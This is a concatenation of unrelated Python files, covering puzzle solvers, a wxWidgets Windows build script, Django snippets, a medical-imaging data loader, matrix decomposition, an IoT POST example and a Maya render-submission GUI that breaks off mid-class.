transportations = ls.transportation_set.all()
transportations = ", ".join(transportation.type for transportation in transportations)
return HttpResponse("<h1>%s</h1><br>Items: %s<br>Transportations: %s" %(ls.name, items, transportations))
|
#!/usr/bin/env python3
import doctest
import itertools as it
import sys
import typing
START_GRID = [['.', '#', '.'],
['.', '.', '#'],
['#', '#', '#']]
TEST_RULES = """../.# => ##./#../...
.#./..#/### => #..#/..../..../#..#"""
Grid = typing.List[typing.List[str]]
Rules = typing.Dict[str, str]
def pattern_to_grid(pattern: str) -> Grid:
"""Convert a pattern description to a grid.
>>> pattern_to_grid('../.#')
[['.', '.'], ['.', '#']]
"""
return [list(line) for line in pattern.split("/")]
def grid_to_pattern(grid: Grid) -> str:
"""Convert a grid to a pattern.
>>> grid_to_pattern([['.', '.'], ['.', '#']])
'../.#'
"""
return "/".join(["".join(line) for line in grid])
def rotate_grid(grid: Grid) -> Grid:
"""Rotate a grid clockwise by 90 degrees.
>>> rotate_grid([['.', '.'], ['.', '#']])
[['.', '.'], ['#', '.']]
"""
size = len(grid)
new_grid = [[''] * size for _ in range(size)]
for x, y in it.product(range(size), repeat=2):
ny = x
nx = size - y - 1
new_grid[ny][nx] = grid[y][x]
return new_grid
def flip_grid(grid: Grid) -> Grid:
"""Flip a grid.
>>> flip_grid([['.', '#'], ['.', '#']])
[['#', '.'], ['#', '.']]
"""
return [line[::-1] for line in grid]
def rotate_pattern(pattern: str) -> str:
"""Rotate a pattern clockwise by 90 degrees.
>>> rotate_pattern('../.#')
'../#.'
>>> rotate_pattern('.#./..#/###')
'#../#.#/##.'
"""
return grid_to_pattern(rotate_grid(pattern_to_grid(pattern)))
def flip_pattern(pattern: str) -> str:
"""Flip a pattern.
>>> flip_pattern('.#./..#/###')
'.#./#../###'
"""
return grid_to_pattern(flip_grid(pattern_to_grid(pattern)))
def parse_rules(data: str) -> Rules:
"""Parse enhancement rules.
>>> list(parse_rules('../.# => ##./#../...').keys())
['../.#', '../#.', '#./..', '.#/..']
"""
rules = {}
for line in data.splitlines():
pattern, res = line.split(" => ")
for _ in range(4):
rules[pattern] = res
rules[flip_pattern(pattern)] = res
pattern = rotate_pattern(pattern)
return rules
def subgrid(grid: Grid, size: int, x: int, y: int) -> Grid:
"""Get a subgrid."""
sgrid = [[''] * size for _ in range(size)]
for xx, yy in it.product(range(size), repeat=2):
sgrid[yy][xx] = grid[y + yy][x + xx]
return sgrid
def fractal_iteration(grid: Grid, rules: Rules) -> Grid:
"""Perform a single iteration of the fractal art process.
>>> grid_to_pattern(fractal_iteration(START_GRID, parse_rules(TEST_RULES)))
'#..#/..../..../#..#'
"""
size = len(grid)
if size % 2 == 0:
sqsz = 2
elif size % 3 == 0:
sqsz = 3
else:
return grid
# Split in squares
new_sqsz = sqsz + 1
new_size = (size // sqsz) * new_sqsz
new_grid = [[''] * new_size for _ in range(new_size)]
for x, y in it.product(range(size // sqsz), repeat=2):
square = [[''] * sqsz for _ in range(sqsz)]
for xx, yy in it.product(range(sqsz), repeat=2):
square[yy][xx] = grid[y * sqsz + yy][x * sqsz + xx]
patt = grid_to_pattern(square)
new_square = pattern_to_grid(rules[patt])
for xx, yy in it.product(range(new_sqsz), repeat=2):
new_grid[y * new_sqsz + yy][x * new_sqsz + xx] = new_square[yy][xx]
return new_grid
def count_pixels(data: str, iterations: int = 5) -> int:
"""Count active pixels after a few iterations.
>>> count_pixels(TEST_RULES, 2)
12
"""
rules = parse_rules(data)
grid = START_GRID
for _ in range(iterations):
grid = fractal_iteration(grid, rules)
pattern = grid_to_pattern(grid)
return pattern.count('#')
if __name__ == "__main__":
err, tot = doctest.testmod()
if err == 0:
print("{} tests OK :]".format(tot))
for fn in sys.argv[1:]:
with open(fn, "r") as fin:
data = fin.read().strip()
print("Pixels on for %s (5 iterations): %d" %
(fn, count_pixels(data, 5)))
print("Pixels on for %s (18 iterations): %d" %
(fn, count_pixels(data, 18)))
|
#!/usr/bin/env python3
import urllib.request
import os
import zipfile
import sys
import argparse
import re
import subprocess
###############################################################################
## Classes
class TextReplacer:
def __init__(self):
self.res = []
def add(self, reg: str, rep: str):
self.res.append( (reg, rep) )
return self
def replace(self, text: str) -> str:
for replacer in self.res:
reg = replacer[0]
rep = replacer[1]
text = text.replace(reg, rep)
return text
class Settings:
def __init__(self, root: str, install_dist: str, install: str, wx_root: str, build: str, appveyor_msbuild: str, platform: str):
self.root = root
self.install_dist = install_dist
self.install = install
self.wx_root = wx_root
self.build = build
self.appveyor_msbuild = appveyor_msbuild
self.platform = platform
def print(self):
print('root:', self.root)
print('install_dist:', self.install_dist)
print('install:', self.install)
print('wx_root:', self.wx_root)
print('build:', self.build)
print('appveyor_msbuild:', self.appveyor_msbuild)
print('platform:', self.platform)
def is_appveyor(self) -> bool:
key = 'APPVEYOR'
value = os.environ[key] if key in os.environ else ''
return value.lower().strip() == 'true'
def append_appveyor(self, args):
if self.is_appveyor():
args.append(self.appveyor_msbuild)
###############################################################################
## Functions
def setup() -> Settings:
root = os.getcwd()
install_dist = os.path.join(root, 'dependencies')
install = os.path.join(root, 'dist')
wx_root = os.path.join(install_dist, 'wx')
build = os.path.join(root, 'build')
appveyor_msbuild = r'/logger:C:\Program Files\AppVeyor\BuildAgent\Appveyor.MSBuildLogger.dll'
platform = 'x64'
if os.environ.get('PLATFORM', 'unknown') == 'x86':
platform = 'Win32'
return Settings(root, install_dist, install, wx_root, build, appveyor_msbuild, platform)
def verify_dir_exist(path):
if not os.path.isdir(path):
os.makedirs(path)
def download_file(url, path):
if not os.path.isfile(path):
urllib.request.urlretrieve(url, path)
else:
print("Already downloaded", path)
def list_projects_in_solution(path):
ret = []
directory_name = os.path.dirname(path)
project_line = re.compile(r'Project\("[^"]+"\) = "[^"]+", "([^"]+)"')
with open(path) as sln:
for line in sln:
# Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "richtext", "wx_richtext.vcxproj", "{7FB0902D-8579-5DCE-B883-DAF66A885005}"
project_match = project_line.match(line)
if project_match:
ret.append(os.path.join(directory_name, project_match.group(1)))
return ret
def add_definition_to_project(path, define):
# <PreprocessorDefinitions>WIN32;_LIB;_CRT_SECURE_NO_DEPRECATE=1;_CRT_NON_CONFORMING_SWPRINTFS=1;_SCL_SECURE_NO_WARNINGS=1;__WXMSW__;NDEBUG;_UNICODE;WXBUILDING;%(PreprocessorDefinitions)</PreprocessorDefinitions>
preproc = re.compile(r'([ ]*<PreprocessorDefinitions>)([^<]*</PreprocessorDefinitions>)')
lines = []
with open(path) as project:
for line in project:
preproc_match = preproc.match(line)
if preproc_match:
lines.append('{0}{1};{2}'.format(preproc_match.group(1), define, preproc_match.group(2)))
else:
lines.append(line.rstrip())
with open(path, mode='w') as project:
for line in lines:
project.write(line + '\n')
# change from:
# <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary> to <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
# <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> to <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
def change_to_static_link(path):
mtdebug = re.compile(r'([ ]*)<RuntimeLibrary>MultiThreadedDebugDLL')
mtrelease = re.compile(r'([ ]*)<RuntimeLibrary>MultiThreadedDLL')
lines = []
with open(path) as project:
for line in project:
mdebug = mtdebug.match(line)
mrelease = mtrelease.match(line)
if mdebug:
print('in {project} changed to static debug'.format(project=path))
lines.append('{spaces}<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>'.format(spaces=mdebug.group(1)))
elif mrelease:
print('in {project} changed to static release'.format(project=path))
lines.append('{spaces}<RuntimeLibrary>MultiThreaded</RuntimeLibrary>'.format(spaces=mrelease.group(1)))
else:
lines.append(line.rstrip())
with open(path, mode='w') as project:
for line in lines:
project.write(line + '\n')
def change_all_projects_to_static(sln):
projects = list_projects_in_solution(sln)
for proj in projects:
change_to_static_link(proj)
def add_definition_to_solution(sln, definition):
projects = list_projects_in_solution(sln)
for proj in projects:
add_definition_to_project(proj, definition)
def make_single_project_64(project_path, rep):
if not os.path.isfile(project_path):
print('missing ' + project_path)
return
lines = []
with open(project_path) as project:
for line in project:
new_line = rep.replace(line.rstrip())
lines.append(new_line)
with open(project_path, 'w') as project:
for line in lines:
project.write(line + '\n')
def make_projects_64(sln):
projects = list_projects_in_solution(sln)
rep = TextReplacer()
rep.add('Win32', 'x64')
rep.add('<DebugInformationFormat>EditAndContinue</DebugInformationFormat>', '<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>')
rep.add('<TargetMachine>MachineX86</TargetMachine>', '<TargetMachine>MachineX64</TargetMachine>')
# protobuf specific hack since cmake looks in x64 folder
rep.add(r'<OutDir>Release\</OutDir>', r'<OutDir>x64\Release\</OutDir>')
rep.add(r'<OutDir>Debug\</OutDir>', r'<OutDir>x64\Debug\</OutDir>')
for project in projects:
make_single_project_64(project, rep)
def make_solution_64(solution_path):
rep = TextReplacer()
rep.add('Win32', 'x64')
lines = []
with open(solution_path) as slnlines:
for line in slnlines:
new_line = rep.replace(line.rstrip())
lines.append(new_line)
with open(solution_path, 'w') as solution_handle:
for line in lines:
solution_handle.write(line + '\n')
def convert_sln_to_64(sln):
make_solution_64(sln)
make_projects_64(sln)
def extract_zip_to(path_to_zip, target):
with zipfile.ZipFile(path_to_zip, 'r') as zip_handle:
zip_handle.extractall(target)
###############################################################################
## Commands
def handle_make_solution_64_cmd(args):
convert_sln_to_64(args.sln)
def handle_change_all_projects_to_static_cmd(args):
change_all_projects_to_static(args.sln)
def handle_list_projects_cmd(cmd):
projects = list_projects_in_solution(cmd.sln)
for proj in projects:
print("project", proj)
def handle_add_definition_cmd(args):
add_definition_to_project(args.project, args.define)
def handle_change_to_static_cmd(args):
change_to_static_link(args.project)
def handle_install_cmd(args):
settings = setup()
build = args.build
wx_url = "https://github.com/wxWidgets/wxWidgets/releases/download/v3.1.4/wxWidgets-3.1.4.zip"
wx_zip = os.path.join(settings.install_dist, "wx.zip")
wx_sln = os.path.join(settings.wx_root, 'build', 'msw', 'wx_vc16.sln')
print('Root:', settings.root)
print('wxWidgets solution: ', wx_sln)
verify_dir_exist(settings.install_dist)
verify_dir_exist(settings.wx_root)
print("downloading wx...")
download_file(wx_url, os.path.join(settings.install_dist, wx_zip))
print("extracting wx")
extract_zip_to(wx_zip, settings.wx_root)
print("changing wx to static")
change_all_projects_to_static(wx_sln)
print("building wxwidgets")
print("-----------------------------------")
wx_msbuild_cmd = [
'msbuild',
'/p:Configuration=Release',
'/p:Platform={}'.format(settings.platform)
]
settings.append_appveyor(wx_msbuild_cmd)
wx_msbuild_cmd.append(wx_sln)
if build:
sys.stdout.flush()
subprocess.check_call(wx_msbuild_cmd)
else:
print(wx_msbuild_cmd)
def handle_cmake_cmd(_):
settings = setup()
subinstall = os.path.join(settings.install, 'windows', settings.platform)
os.makedirs(settings.build)
os.makedirs(settings.install)
os.makedirs(subinstall)
generator = 'Visual Studio 16 2019'
cmakecmd = [
'cmake',
"-DCMAKE_INSTALL_PREFIX={}".format(subinstall),
"-DwxWidgets_ROOT_DIR={}".format(settings.wx_root),
"-DRIDE_BUILD_COMMIT=%APPVEYOR_REPO_COMMIT%",
"-DRIDE_BUILD_NUMBER=%APPVEYOR_BUILD_NUMBER%",
"-DRIDE_BUILD_BRANCH=%APPVEYOR_REPO_BRANCH%",
"-DRIDE_BUILD_REPO=%APPVEYOR_REPO_NAME%",
'-G', generator,
'-A', settings.platform,
settings.root
]
sys.stdout.flush()
subprocess.check_call(cmakecmd, cwd=settings.build)
def handle_build_cmd(_):
settings = setup()
ride_sln = os.path.join(settings.build, 'PACKAGE.vcxproj')
ride_msbuild_cmd = [
'msbuild',
'/p:Configuration=Release',
'/p:Platform={}'.format(settings.platform),
settings.appveyor_msbuild,
ride_sln
]
sys.stdout.flush()
subprocess.check_call(ride_msbuild_cmd)
def handle_print_cmd(_):
settings = setup()
settings.print()
###############################################################################
## Main
def main():
parser = argparse.ArgumentParser(description='Does the windows build')
subparsers = parser.add_subparsers()
install_parser = subparsers.add_parser('install')
install_parser.set_defaults(func=handle_install_cmd)
install_parser.add_argument('--nobuild', dest='build', action='store_const', const=False, default=True)
install_parser = subparsers.add_parser('listprojects')
install_parser.set_defaults(func=handle_list_projects_cmd)
install_parser.add_argument('sln', help='solution file')
static_project_parser = subparsers.add_parser('static_project')
static_project_parser.set_defaults(func=handle_change_to_static_cmd)
static_project_parser.add_argument('project', help='make a project staticly link to the CRT')
static_project_parser = subparsers.add_parser('to64')
static_project_parser.set_defaults(func=handle_make_solution_64_cmd)
static_project_parser.add_argument('sln', help='the solution to upgrade')
static_solution_parser = subparsers.add_parser('static_sln')
static_solution_parser.set_defaults(func=handle_change_all_projects_to_static_cmd)
static_solution_parser.add_argument('sln', help='make all the projects in the specified solution staticly link to the CRT')
install_parser = subparsers.add_parser('add_define')
install_parser.set_defaults(func=handle_add_definition_cmd)
install_parser.add_argument('project', help='project file')
install_parser.add_argument('define', help='preprocessor to add')
cmake_parser = subparsers.add_parser('cmake')
cmake_parser.set_defaults(func=handle_cmake_cmd)
build_parser = subparsers.add_parser('build')
build_parser.set_defaults(func=handle_build_cmd)
print_parser = subparsers.add_parser('print')
print_parser.set_defaults(func=handle_print_cmd)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main()
|
#in this script, we are going to do various things to interact with a webpage
from selenium import webdriver
beginning_url = 'https://flps.newberry.org/'
driver = webdriver.Chrome()
driver.get(beginning_url)
# now let us try to locate elements, and select data from these elements
# https://selenium-python.readthedocs.io/locating-elements.html
my_css_selector = ''
element = driver.find_element_by_css_selector(my_css_selector)
element.text
element.get_attribute('href')
#we can move the page (first number is x axis, second number is y axis)
driver.execute_script('window.scrollTo(0, 500)')
#we can search in search bars
searchbar = driver.find_element_by_css_selector('#search_terms')
searchbar.send_keys('Poland')
# AND we can click buttons
searchbutton = driver.find_element_by_css_selector('#search_button')
searchbutton.click()
#don't forget to close the driver
driver.close() |
from datetime import datetime
import sys
"""
Converts human-readable timestamp into epoch milliseconds.
Input schema (CSV): station_id,bikes_available,docks_available,timestamp
Output schema (CSV): station_id,bikes_available,docks_available,timestamp (epoch milliseconds)
Usage: data/status.csv | python 1-parse-date-time.py > outfile.csv
"""
def parse_time(t):
try:
return datetime.strptime(t, '"%Y/%m/%d %H:%M:%S"')
except ValueError:
return datetime.strptime(t, '"%Y-%m-%d %H:%M:%S"')
for line in sys.stdin:
fields = line.strip().split(',')
date = parse_time(fields[3])
fields.pop()
fields.append(str(date.timestamp()))
print(",".join(fields)) |
from django.contrib import admin
from .models import Post
# Register your models here.
class PostAdmin(admin.ModelAdmin):
list_display = ("user_id", "created", "body", "picture")
#register flight with flightadmin settings
admin.site.register(Post) |
import SimpleITK as sitk
import numpy as np
import os
from keras.utils import to_categorical
def sliding_window(data_shape, window_size, moving_size):
"""滑窗的形式产生cropped cube坐标
data_shape:CT的大小
window_size:cropped cube的大小
moving_size:滑动大小
"""
coor = []
for i in range(3):
res_sizei = (data_shape[i] - window_size[i]) // moving_size[i] + 1
coori = [k*moving_size[i] for k in range(res_sizei)]
if len(coori) == 0:
print (data_shape)
if coori[-1] != data_shape[i] - window_size[i]:
coori.append(data_shape[i] - window_size[i])
coor.append(coori)
left_right_top = []
for c0 in coor[0]:
for c1 in coor[1]:
for c2 in coor[2]:
left_right_top.append((c0, c1, c2, c0+window_size[0], c1+window_size[1], c2+window_size[2]))
return left_right_top
class LobeData(object):
def __init__(self, window_size, moving_size, test_moving_size, train_path='./lobe_data/train/',
test_path='./lobe_data/test/'):
"""
window_size:cropped cube的大小
moving_size:训练时的滑动大小
test_moving_size:测试时的滑动大小
train_path:训练数据所在路径
test_path:测试数据所在路径
"""
super(LobeData, self).__init__()
self.train_path = train_path
self.test_path = test_path
self.window_size = window_size
self.moving_size = moving_size
self.test_moving_size = test_moving_size
self.num_classes = 6
def one_hot(self, label, num_classes):
"""将label改成one hot形式
num_classes:类别数
"""
new_shape = label.shape + (num_classes,)
label = label.flatten()
label = to_categorical(label, num_classes)
one_hot_label = np.reshape(label, new_shape)
return one_hot_label
def load_train_data(self, validation=False):
file_names = os.listdir(self.train_path)
label_file_names = [f for f in file_names if f.endswith('_label.nii.gz')]
label_file_names.sort()
label_file_names = label_file_names
data_file_names = [f.replace('_label', '') for f in label_file_names]
file_num = len(data_file_names)
dataset_coors = [] # shape = (dataset_size, VOI_nums, 3)
images = []
labels = []
edges = []
fissure_pros = []
#
positive_num = 0.0
voxel_num = 0.0
class_num = np.zeros((6,))
#
for data_name, label_name in zip(data_file_names, label_file_names):
print (data_name)
# if data_name.endswith("7742.nii.gz"):
# print (data_name, "pass")
# continue
itk_img = sitk.ReadImage(os.path.join(self.train_path, data_name))
img = sitk.GetArrayFromImage(itk_img)
itk_label = sitk.ReadImage(os.path.join(self.train_path, label_name))
label = sitk.GetArrayFromImage(itk_label)
edge_name = label_name.replace('_label', '_edge2')
itk_edge = sitk.ReadImage(os.path.join(self.train_path, edge_name))
edge = sitk.GetArrayFromImage(itk_edge)
fissure_pro_name = label_name.replace('_label', '_fissure_prob')
itk_fissure_pro = sitk.ReadImage(os.path.join(self.train_path, fissure_pro_name))
fissure_pro = sitk.GetArrayFromImage(itk_fissure_pro)
edge = self.one_hot(edge, 2)
positive_num += np.sum(label > 0)
label = self.one_hot(label, self.num_classes)
img = img.astype(np.float32)
img = img.astype(np.float32) / 255.0
label = label.astype(np.float32)
# label_num = np.sum(label, axis=(0,1,2))
# class_num = class_num + label_num
edge = edge.astype(np.float32)
fissure_pro = fissure_pro.astype(np.float32)
voxel_num += img.size
# label = np.pad(label, 1, 'constant', constant_values=0)
img = img[..., np.newaxis]
fissure_pro = fissure_pro[..., np.newaxis]
# label = label[..., np.newaxis]
images.append(img)
labels.append(label)
edges.append(edge)
fissure_pros.append(fissure_pro)
coors = sliding_window(img.shape, self.window_size, self.moving_size)
num = len(coors)
filtered_coors = []
for i in range(num):
coor = coors[i]
temp_label = label[coor[0]:coor[3],coor[1]:coor[4],coor[2]:coor[5],0:1]
if np.sum(temp_label > 0) > 100:# and np.sum(temp_label) < 5000:###150
filtered_coors.append(coor)
dataset_coors.append(filtered_coors)
# print("class_num", class_num)
# class_num = class_num / np.sum(class_num)
# print("class_num", class_num)
print("positive rate:%f" % (positive_num/voxel_num))
if validation:
return (images[0:file_num-1],fissure_pros[0:file_num-1]), labels[0:file_num-1], edges[0:file_num-1],\
dataset_coors[0:file_num-1], (images[file_num-1:file_num], fissure_pros[file_num-1:file_num]), labels[file_num-1:file_num], edges[file_num-1:file_num],\
dataset_coors[file_num-1:file_num]
else:
return (images,fissure_pros), labels, edges, dataset_coors
def load_test_data(self):
file_names = os.listdir(self.test_path)
label_file_names = [f for f in file_names if f.endswith('_label.nii.gz')]
label_file_names.sort()
label_file_names = label_file_names
data_file_names = [f.replace('_label', '') for f in label_file_names]
file_num = len(data_file_names)
dataset_coors = [] # shape = (dataset_size, VOI_nums, 3)
images = []
labels = []
edges = []
fissure_pros = []
test_names = []
for data_name, label_name in zip(data_file_names, label_file_names):
print (data_name)
# if data_name.endswith("7734.nii.gz"):
# print (data_name, "pass")
# continue
test_names.append(data_name)
itk_img = sitk.ReadImage(os.path.join(self.test_path, data_name))
img = sitk.GetArrayFromImage(itk_img)
itk_label = sitk.ReadImage(os.path.join(self.test_path, label_name))
label = sitk.GetArrayFromImage(itk_label)
edge_name = label_name.replace('_label', '_edge2')
itk_edge = sitk.ReadImage(os.path.join(self.test_path, edge_name))
edge = sitk.GetArrayFromImage(itk_edge)
fissure_pro_name = label_name.replace('_label', '_fissure_prob')
itk_fissure_pro = sitk.ReadImage(os.path.join(self.test_path, fissure_pro_name))
fissure_pro = sitk.GetArrayFromImage(itk_fissure_pro)
edge = self.one_hot(edge, 2)
label = self.one_hot(label, self.num_classes)
img = img.astype(np.float32)
img = img.astype(np.float32) / 255.0
label = label.astype(np.float32)
edge = edge.astype(np.float32)
fissure_pro = fissure_pro.astype(np.float32)
fissure_pro = fissure_pro[..., np.newaxis]
# label = np.pad(label, 1, 'constant', constant_values=0)
img = img[..., np.newaxis]
# label = label[..., np.newaxis]
images.append(img)
labels.append(label)
edges.append(edge)
fissure_pros.append(fissure_pro)
coors = sliding_window(img.shape, self.window_size, self.test_moving_size)
dataset_coors.append(coors)
return (images,fissure_pros), labels, edges, dataset_coors, test_names
|
import numpy as np
from Vector2D import *
class AffineTransform:
def __init__(self, drawingSurface, xMin, xMax, yMin, yMax):
sx = drawingSurface.get_width() / (xMax - xMin)
sy = -1.0 * drawingSurface.get_height() / (yMax - yMin)
tx = -1.0 * sx * xMin
ty = -1.0 * sy * yMax
m = np.array([[sx, 0, tx],
[0, sy, ty],
[0, 0, 1]])
self.__drawingSurface = drawingSurface
self.__translateAndScaleMatrix = m
def transformCoord(self, pt: Vector2D):
ptT = [pt.X, pt.Y, 1]
# ptT = rotationMatrix.dot(ptT)
ptT = self.__translateAndScaleMatrix.dot(ptT)
return Vector2D(ptT[0], ptT[1]) |
# -*- coding: utf-8 -*-
"""
Iot dashboard POST example
iot-dashboard
IoT: Platform for Internet of Things
Iotdashboard source code is available under the MIT License
Online iot dashboard test and demo http://ihook.xyz
Online iot dashboard https://iothook.com
You can find project details on our project page https://iothook.com and wiki https://iothook.com
"""
import requests
import httplib, urllib
API_KEY = "0cd76eb-5f3b179"
url = 'http://localhost:8000/api/v1/data/' + API_KEY
datas = urllib.urlencode({"name_id":"test", "value":"45", })
resp = requests.post(url, data=datas, auth=('iottestuser', 'iot12345**'))
print resp
|
sahar=int(input("מהו השכר? "))
gidul=int(input("מה אחוז הגידול? "))
print(sahar+gidul*10) |
__author__ = 'mcardle'
import numpy as np
class Trip(object):
def __init__(self, id, trip_data):
self.Id = id
self.trip_data = trip_data
self.velocity_vectors = np.diff(trip_data, axis=0)
self.tang_accel_vectors = np.diff(self.velocity_vectors, axis=0)
self.speed = Trip.normalize(self.velocity_vectors)
self.tang_accel_mag = Trip.normalize(self.tang_accel_vectors)
self.accel_mag = np.diff(self.speed, axis=0)
self.delta_accel_mag = np.diff(self.accel_mag, axis=0)
self.accel_mag_pos = self.accel_mag[self.accel_mag > 0]
self.accel_mag_neg = np.fabs(self.accel_mag[self.accel_mag < 0])
self.trip_len_meters = np.sum(self.speed, axis=0)
def percentiles_accel(self):
if len(self.accel_mag_pos) > 0:
return np.percentile(self.accel_mag_pos, [25.0,50.0,75.0,100.0])
else:
return [0.0,0.0,0.0,0.0]
def percentiles_decel(self):
if len(self.accel_mag_neg) > 0:
return np.percentile(self.accel_mag_neg, [25.0,50.0,75.0,100.0])
else:
return [0.0,0.0,0.0,0.0]
def percentiles_tang_accel(self):
if len(self.tang_accel_mag) > 0:
return np.percentile(self.tang_accel_mag, [25.0,50.0,75.0,100.0])
else:
return [0.0,0.0,0.0,0.0]
def percentiles_delta_accel(self):
if len(self.delta_accel_mag) > 0:
return np.percentile(self.delta_accel_mag, [25.0,50.0,75.0,100.0])
else:
return [0.0,0.0,0.0,0.0]
def percentiles_speed(self):
if len(self.speed) > 0:
return np.percentile(self.speed, [25.0,50.0,75.0,100.0])
else:
return [0.0,0.0,0.0,0.0]
@staticmethod
def _mean(value_array):
if len(value_array)> 0:
return np.mean(value_array)
else:
return 0
@staticmethod
def _std(value_array):
if len(value_array)> 0:
return np.std(value_array)
else:
return 0
@staticmethod
def indices_consec_zeros(value_array):
""" Provide indices of subsequent consecutive zeros
"""
indicies_list = []
indices = Trip.find_zeros(value_array)
last_val = -100
for idx in indices:
if idx == last_val + 1:
indicies_list.append(idx)
last_val = idx
return indicies_list
@staticmethod
def find_zeros(speeds, tolerance = 0.2):
""" Find indices of zeros
:param speeds: array of speed values
:param tolerance: value below that considered not moving
:return: array of indices
"""
return np.where(speeds < tolerance )[0]
@staticmethod
def normalize(vectors):
#...why faster than np.linalg.normalize???
return np.sqrt(np.sum(vectors**2, axis=1)) |
import pickle
import time
import numpy as np
from src.utility import find_filter
from src.utility import final_results, svd_decomposition, SVD_K
def cur_decomposition(matrix, sample_r):
"""Perform SVD decomposition of a given matrix
Parameters
----------
matrix : numpy matrix
A matrix of which CUR decomposition needs to be done
sample_r : int
Number of singular values that needs to be retained during decomposition
Returns
-------
tuple
A tuple containing C, U and R matrix
"""
try:
with open("files/cur_c", 'rb') as f:
c = pickle.load(f)
with open("files/cur_u", 'rb') as f:
u = pickle.load(f)
with open("files/cur_r", 'rb') as f:
r = pickle.load(f)
except FileNotFoundError:
total = np.sum(matrix ** 2)
rows, cols = matrix.shape
col_values = [np.sum(col ** 2) / total for col in matrix.T]
row_values = [np.sum(row ** 2) / total for row in matrix]
random_cols = np.random.choice(range(0, cols), sample_r, p=col_values)
random_rows = np.random.choice(range(0, rows), sample_r, p=row_values)
c = matrix[:, random_cols]
r = matrix[random_rows]
w = c[random_rows]
for i in range(sample_r):
norm = np.sqrt(sample_r * col_values[random_cols[i]])
if norm > 0:
c[:, i] /= norm
for i in range(sample_r):
norm = np.sqrt(sample_r * row_values[random_rows[i]])
if norm > 0:
r[i] /= norm
x, z, yt = svd_decomposition("cur_u_u", "cur_u_d", "cur_u_vt", w, sample_r)
u = np.dot(np.dot(yt.T, np.linalg.pinv(z) ** 2), x.T)
with open("files/cur_c", 'wb+') as f:
pickle.dump(c, f)
with open("files/cur_u", 'wb+') as f:
pickle.dump(u, f)
with open("files/cur_r", 'wb+') as f:
pickle.dump(r, f)
return c, u, r
def get_cur_results(matrix):
"""Apply appropriate operations on a given matrix to use CUR technique to predict ratings
Parameters
----------
matrix : numpy matrix
Original matrix on which CUR technique needs to be applied
Returns
-------
tuple
A tuple containing all performance measures of the CUR technique with and without 90% energy retention
"""
c, u, r = cur_decomposition(matrix, int(SVD_K * np.log10(SVD_K)))
print("CUR Decomposition Done!")
start = time.time()
reconstructed_matrix = np.dot(np.dot(c, u), r)
mask = (matrix > 0)
actual = matrix[mask]
predicted = reconstructed_matrix[mask]
result_one = final_results(actual, predicted)
print("Time taken for CUR = " + str(time.time() - start) + " seconds")
start = time.time()
energy_filter = find_filter(u)
c = c[:, 0:energy_filter]
u = u[0:energy_filter, 0:energy_filter]
r = r[0:energy_filter]
reconstructed_matrix = np.dot(np.dot(c, u), r)
predicted = reconstructed_matrix[mask]
result_second = final_results(actual, predicted)
print("Time taken for CUR with 90% energy = " + str(time.time() - start) + " seconds")
return result_one, result_second
|
import re
toggleRE = re.compile("toggle")
turnoffRE = re.compile("turn off")
turnonRE = re.compile("turn on")
cordsRE = re.compile("\d+")
squareSize = 1000
def turnOn(num):
return num +1
def turnOff(num):
if num == 0:
return num
return num -1
def toggle(num):
return num + 2
lightArray = [[0 for i in range(squareSize)] for j in range(squareSize)]
with open('Day06/LightDirections.txt') as file:
while True:
line = file.readline().rstrip()
if not line:
break
action = turnOn
if(toggleRE.match(line)):
action = toggle
elif(turnoffRE.match(line)):
action = turnOff
cords = cordsRE.findall(line)
for x in range(int(cords[0]),int(cords[2])+1):
for y in range(int(cords[1]),int(cords[3])+1):
lightArray[x][y] = action(lightArray[x][y])
output = open("lightArray.txt","w")
finalOnCount = 0
for x in range(squareSize):
output.write(lightArray[x].__str__())
finalOnCount = finalOnCount + sum(lightArray[x])
print (finalOnCount)
|
import os, re, string, getpass
import rrt
from rrt.maya.shortcuts import scene_is_dirty, get_job_type, get_scene_name,\
get_frame_range
from pymel import versions
from pymel.core.system import workspace, sceneName
from pymel.core.general import Scene
from pymel.core import frameLayout, button, menuItem, columnLayout,\
optionMenu, intField, textField, text, formLayout, uiTemplate, window,\
confirmBox, checkBox, radioCollection, radioButton, setParent
from pymel.core.language import scriptJob #@UnresolvedImport
from rrt.localJobSpec import JobSpec
from random import randint
LOG = rrt.get_log('hpcSubmit')
class SubmitGui:
""" A python singleton """
# storage for the instance reference
__instance = None
def __init__(self):
""" Create singleton instance """
# Check whether we already have an instance
if SubmitGui.__instance is None:
# Create and remember instance
SubmitGui.__instance = SubmitGui.__impl()
# Store instance reference as the only member in the handle
self.__dict__['_SubmitGui__instance'] = SubmitGui.__instance
@staticmethod
def destroy():
try: SubmitGui.__instance.destroy()
except: pass
SubmitGui.__instance = None
def __getattr__(self, attr):
""" Delegate access to implementation """
return getattr(self.__instance, attr)
def __setattr__(self, attr, value):
""" Delegate access to implementation """
return setattr(self.__instance, attr, value)
class __impl:
"""
Manages the window, its data, the ini generation, and submission
routines.
"""
window_title = "Launch Local Render"
_win = None
_controls = {}
# a regex used to strip out bad chars in filenames
_filter_text_pattern = re.compile('[%s]' % re.escape(string.punctuation))
_allowed_punctuation = r'/\._-'
_illegal_path = re.sub('[%s]' % re.escape(_allowed_punctuation),'',string.punctuation)
def filter_text(self, s):
return self._filter_text_pattern.sub('', s).strip()
# references to key controls
@property
def job_title(self):
"""
Read-only filtered version of the job title.
"""
return self.filter_text(self._controls['title'].getText())
# @property
#deprecated
# def job_threads(self):
# """
# Number of threads to render with, as specified by the control in the
# submit window.
# """
# return int(self._controls['threads'].getValue())
@property
def job_start(self):
return min((int(self._controls['start'].getValue()),int(self._controls['end'].getValue())))
@property
def job_end(self):
return max((int(self._controls['start'].getValue()),int(self._controls['end'].getValue())))
@property
def job_step(self):
return int(self._controls['step'].getValue())
@property
def job_data(self):
moddedType = str(get_job_type())
if os.environ['EMULATE'] == '0':
moddedType +='_local'
return {
'renderer': moddedType,
'title': self.job_title,
'project': os.path.normpath(workspace.getPath()),
'output': os.path.join('D:\\hpc\\', getpass.getuser(), '{job_id}', 'output'), # job_id is injected by hpc-spool when the submission happens
'scene': os.path.normpath(sceneName()),
'start': self.job_start,
'end': self.job_end,
'threads': 4, #self.job_threads,
'step': self.job_step,
'ext' : None
}
def _is_valid(self):
